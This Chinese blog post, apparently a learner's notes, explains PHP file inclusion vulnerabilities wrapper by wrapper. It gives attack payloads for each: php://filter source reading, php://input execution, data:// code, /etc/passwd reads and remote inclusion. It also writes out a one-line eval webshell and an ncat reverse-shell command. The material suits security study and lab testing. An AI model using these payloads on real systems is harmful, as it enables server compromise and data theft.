文件包含漏洞

最新推荐文章于 2024-05-07 20:29:59 发布
最新推荐文章于 2024-05-07 20:29:59 发布
阅读量166 收藏
点赞数
分类专栏: web 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44411509/article/details/118928836
版权

文件包含漏洞

文章目录

基本函数

	require():包含文件出错,停止运行
	require_once():包含文件出错,一次运行停止运行
	include():包含文件出错,抛出告警,但继续运行
	include_once():包含文件出错,一次运行抛出告警,但继续运行
	以上函数会在包含文件时,将文件的php代码执行。

PHP伪协议

php://filter

用途:读取文件
攻击方法:base64读取文件源码源码
	参数=php://filter/read=convert.base64-encode/resource=1.txt
一般防御方法:
	将参数拼接时加入固定格式后缀,即:include($_GET['ym'].'.php')
防御绕过:
	1.在php5.3.24版本中可使用%00截断,截断拼接
	2.疯狂加'.',绕过拼接长度

php://input

用途:php://input可接受post数据,并执行,因此可以postphp代码执行
攻击方法:
	1.参数=php://input
	2.更改数据包post,添加<?php phpinfo()?>即可运行
扩展攻击:
	一句话木马写入:
		post包:
		<?php fputs(fopen('input_shell.php','w'),'<?php @eval($_POST[1]);?>')?>
	反弹shell:
		post包:
		system('ncat -e /bin/bash localhost 1234');

data伪协议

攻击方法:
	data://text/plain,<?php phpinfo();?>
	data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+

在实验过程中base64编码无法执行,原因是<?php phpinfo();?>在编成base64的时候出现了+。而浏览器不认识+号。所以解决方法

1.不写后面的?>或者直接删除‘;’ 因为PHP里面其实不需要写后面的 前面的;号就已经说明结束了。如果没有;号就必须写?>作为结束。
2.添加空格改变base64编码。
3.将+号换成%2b

参考链接:

https://blog.csdn.net/qq_46091464/article/details/106665358

file伪协议

用途:读取文件
攻击方法:
	file:///Window/win.ini
	file:///etc/passwd

phar伪协议

用途:读取压缩包
攻击方法:
	参数=phar://phpinfo.zip/phpinfo.txt

zip伪协议

用途:读取压缩包
攻击方法:
	参数=zip://phpinfo.zip%23phpinfo.txt

远程文件包含

http://192.168.47.99:8088/?ym=http://192.168.47.47:7544/1.txt
主机99远程执行主机47的1.txt内容,主机99执行1.txt的php代码。

192.168.47.99:8088/?ym=http://192.168.47.47:7544/1.php
主机99远程获取主机47的执行1.php的内容,主机47执行1.php后的网页源代码,将结果放送给主机99
Geniotic
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java如何实现判断文件的真实类型
08-29
本篇文章主要介绍了java如何实现判断文件的真实类型,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
java通过文件头内容判断文件类型
04-22
java通过文件头内容判断文件类型
Java判断文件类型
weixin_33923148的博客
08-04 170
2019独角兽企业重金招聘Python工程师标准>>> ...
java判断文件类型
weixin_39892176的博客
12-05 1739
package com.base.utils; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.IOException; import java.util.Date; import java.util.HashMap; import java.util.Iterator; im...
Java 中如何识别文件类型
杂货铺的少掌柜
09-16 552
Java 识别文件后缀
在 Java 中确定文件类型
免费
05-06 704
在这个方法中,我们调用 method,我们得到 image/jpeg 作为文件类型。在这些下载和上传过程中,我们有时需要指定文件的格式,或者我们需要确保文件的格式与用户选择的格式相同。对于这些需求,我们可以在 Java 中使用多种方法。如果我们将原本是JPEG格式的文件转换为FileInputStream,但是我们将其扩展名更改为PPTX并将其作为参数提供给,我们将得到以下结果:getFileTpyeByTika。正如我们所看到的,尽管文件扩展名发生了变化,Apache Tika仍可以正确检测文件类型。
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
java下载文件各类型类
11-04
java下载文件各类型类
JAVA校验文件类型
Great_est的博客
02-06 2045
通常校验文件类型,是获取文件后缀,根据后缀名进行判断。但其实这种方式是有被欺骗风险的。这里记录几种判断文件类型的方式。
Java判断图片文件的类型 根据图片2进制判断
Benson
07-29 446
import java.io.*; import javax.imageio.*; import java.awt.image.*; import java.util.*; import javax.imageio.stream.*; public class Test{ public static void main(String[] args) { File...
Airflow【部署 01】Airflow官网Quick Start实操(一篇学会部署Airflow)_apache airflow教程(1)
最新发布
2401_84253850的博客
05-07 1079
①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等①Windows系统常见功能和命令。
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值